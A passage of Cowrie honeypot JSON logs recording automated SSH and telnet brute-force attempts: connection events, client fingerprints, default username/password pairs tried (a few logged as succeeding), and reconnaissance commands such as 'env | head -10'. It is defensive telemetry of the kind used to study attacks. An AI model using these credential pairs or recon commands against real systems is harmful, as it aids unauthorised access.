sage":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:16:13.193550Z","src_ip":"41.226.27.251","session":"ad3fdce3720b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-31T03:16:13.327098Z","src_ip":"41.226.27.251","session":"ad3fdce3720b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57694,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c640ea73a2c","protocol":"ssh","message":"New connection: 212.227.235.229:57694 (1.2.3.4:22) [session: 9c640ea73a2c]","sensor":"my-vps","timestamp":"2025-08-31T03:16:13.524083Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:16:14.286165Z","src_ip":"212.227.235.229","session":"9c640ea73a2c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:16:14.287244Z","src_ip":"212.227.235.229","session":"9c640ea73a2c"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:16:14.588849Z","src_ip":"41.226.27.251","session":"ad3fdce3720b"}
{"eventid":"cowrie.session.closed","duration":"36.3","message":"Connection lost after 36.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:16:17.440503Z","src_ip":"212.227.235.229","session":"e72cc56114a4"}
{"eventid":"cowrie.login.failed","username":"git","password":"admin123","message":"login attempt [git/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:16:20.082551Z","src_ip":"212.227.235.229","session":"9c640ea73a2c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:16:21.201079Z","src_ip":"212.227.125.160","session":"8a50819265c5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:16:21.201880Z","src_ip":"212.227.125.160","session":"8a50819265c5"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:16:21.921692Z","src_ip":"212.227.235.229","session":"9c640ea73a2c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58602,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d722f582d34","protocol":"ssh","message":"New connection: 212.227.235.229:58602 (1.2.3.4:22) [session: 7d722f582d34]","sensor":"my-vps","timestamp":"2025-08-31T03:16:25.918225Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":42206,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ea64ce27dc2","protocol":"ssh","message":"New connection: 41.226.27.251:42206 (1.2.3.4:22) [session: 2ea64ce27dc2]","sensor":"my-vps","timestamp":"2025-08-31T03:16:33.275502Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:16:33.276309Z","src_ip":"41.226.27.251","session":"2ea64ce27dc2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:16:33.318900Z","src_ip":"41.226.27.251","session":"2ea64ce27dc2"}
{"eventid":"cowrie.login.failed","username":"steam","password":"steam123","message":"login attempt [steam/steam123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:16:33.448535Z","src_ip":"41.226.27.251","session":"2ea64ce27dc2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47492,"dst_ip":"1.2.3.4","dst_port":22,"session":"52eb8db385a1","protocol":"ssh","message":"New connection: 212.227.125.160:47492 (1.2.3.4:22) [session: 52eb8db385a1]","sensor":"my-vps","timestamp":"2025-08-31T03:16:34.322628Z"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:16:34.787067Z","src_ip":"41.226.27.251","session":"2ea64ce27dc2"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:16:34.963688Z","src_ip":"212.227.125.160","session":"52eb8db385a1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:16:34.964836Z","src_ip":"212.227.125.160","session":"52eb8db385a1"}
{"eventid":"cowrie.login.failed","username":"git","password":"admin123","message":"login attempt [git/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:16:37.013205Z","src_ip":"212.227.125.160","session":"52eb8db385a1"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:16:38.507783Z","src_ip":"212.227.125.160","session":"52eb8db385a1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40495,"dst_ip":"1.2.3.4","dst_port":23,"session":"0699a2db12e9","protocol":"telnet","message":"New connection: 212.227.235.229:40495 (1.2.3.4:23) [session: 0699a2db12e9]","sensor":"my-vps","timestamp":"2025-08-31T03:16:52.852727Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":34264,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e19a2176d91","protocol":"ssh","message":"New connection: 41.226.27.251:34264 (1.2.3.4:22) [session: 1e19a2176d91]","sensor":"my-vps","timestamp":"2025-08-31T03:16:53.349994Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:16:53.399837Z","src_ip":"41.226.27.251","session":"1e19a2176d91"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:16:53.401009Z","src_ip":"41.226.27.251","session":"1e19a2176d91"}
{"eventid":"cowrie.session.closed","duration":"27.5","message":"Connection lost after 27.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:16:53.427037Z","src_ip":"212.227.235.229","session":"7d722f582d34"}
{"eventid":"cowrie.login.failed","username":"es","password":"es","message":"login attempt [es/es] failed","sensor":"my-vps","timestamp":"2025-08-31T03:16:53.595238Z","src_ip":"41.226.27.251","session":"1e19a2176d91"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:16:54.831483Z","src_ip":"41.226.27.251","session":"1e19a2176d91"}
{"eventid":"cowrie.session.closed","duration":13.09167218208313,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:17:05.944309Z","src_ip":"212.227.235.229","session":"0699a2db12e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53756,"dst_ip":"1.2.3.4","dst_port":22,"session":"62ee39b7f745","protocol":"ssh","message":"New connection: 212.227.125.160:53756 (1.2.3.4:22) [session: 62ee39b7f745]","sensor":"my-vps","timestamp":"2025-08-31T03:17:08.669410Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:17:10.002104Z","src_ip":"212.227.125.160","session":"62ee39b7f745"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:17:10.002976Z","src_ip":"212.227.125.160","session":"62ee39b7f745"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37288,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b696d24a827","protocol":"ssh","message":"New connection: 212.227.235.229:37288 (1.2.3.4:22) [session: 9b696d24a827]","sensor":"my-vps","timestamp":"2025-08-31T03:17:12.264212Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:17:13.245325Z","src_ip":"212.227.235.229","session":"9b696d24a827"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:17:13.246944Z","src_ip":"212.227.235.229","session":"9b696d24a827"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":46032,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c1695322ae6","protocol":"ssh","message":"New connection: 41.226.27.251:46032 (1.2.3.4:22) [session: 9c1695322ae6]","sensor":"my-vps","timestamp":"2025-08-31T03:17:13.513990Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:17:13.583412Z","src_ip":"41.226.27.251","session":"9c1695322ae6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:17:13.584150Z","src_ip":"41.226.27.251","session":"9c1695322ae6"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@WSX","message":"login attempt [root/1qaz@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:17:13.759377Z","src_ip":"41.226.27.251","session":"9c1695322ae6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:17:13.864532Z","src_ip":"41.226.27.251","session":"9c1695322ae6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:17:13.865284Z","src_ip":"41.226.27.251","session":"9c1695322ae6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:17:13.909744Z","src_ip":"41.226.27.251","session":"9c1695322ae6"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:17:13.910875Z","src_ip":"41.226.27.251","session":"9c1695322ae6"}
{"eventid":"cowrie.login.success","username":"root","password":"Cadu147963","message":"login attempt [root/Cadu147963] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:17:15.978638Z","src_ip":"212.227.125.160","session":"62ee39b7f745"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"sonar123","message":"login attempt [sonar/sonar123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:17:17.844873Z","src_ip":"212.227.125.160","session":"8a50819265c5"}
{"eventid":"cowrie.login.failed","username":"git","password":"root123","message":"login attempt [git/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:17:18.841434Z","src_ip":"212.227.235.229","session":"9b696d24a827"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:17:18.878912Z","src_ip":"212.227.125.160","session":"62ee39b7f745"}
{"eventid":"cowrie.command.input","input":"env | head -10","message":"CMD: env | head -10","sensor":"my-vps","timestamp":"2025-08-31T03:17:18.879605Z","src_ip":"212.227.125.160","session":"62ee39b7f745"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","size":28,"shasum":"54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:17:20.358579Z","src_ip":"212.227.125.160","session":"62ee39b7f745"}
{"eventid":"cowrie.session.closed","duration":"11.7","message":"Connection lost after 11.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:17:20.359954Z","src_ip":"212.227.125.160","session":"62ee39b7f745"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:17:20.741456Z","src_ip":"212.227.235.229","session":"9b696d24a827"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32872,"dst_ip":"1.2.3.4","dst_port":22,"session":"58ab95574dc1","protocol":"ssh","message":"New connection: 212.227.125.160:32872 (1.2.3.4:22) [session: 58ab95574dc1]","sensor":"my-vps","timestamp":"2025-08-31T03:17:21.632954Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56960,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fbf7af57e47","protocol":"ssh","message":"New connection: 212.227.125.160:56960 (1.2.3.4:22) [session: 9fbf7af57e47]","sensor":"my-vps","timestamp":"2025-08-31T03:17:23.658162Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:17:23.658985Z","src_ip":"212.227.125.160","session":"9fbf7af57e47"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 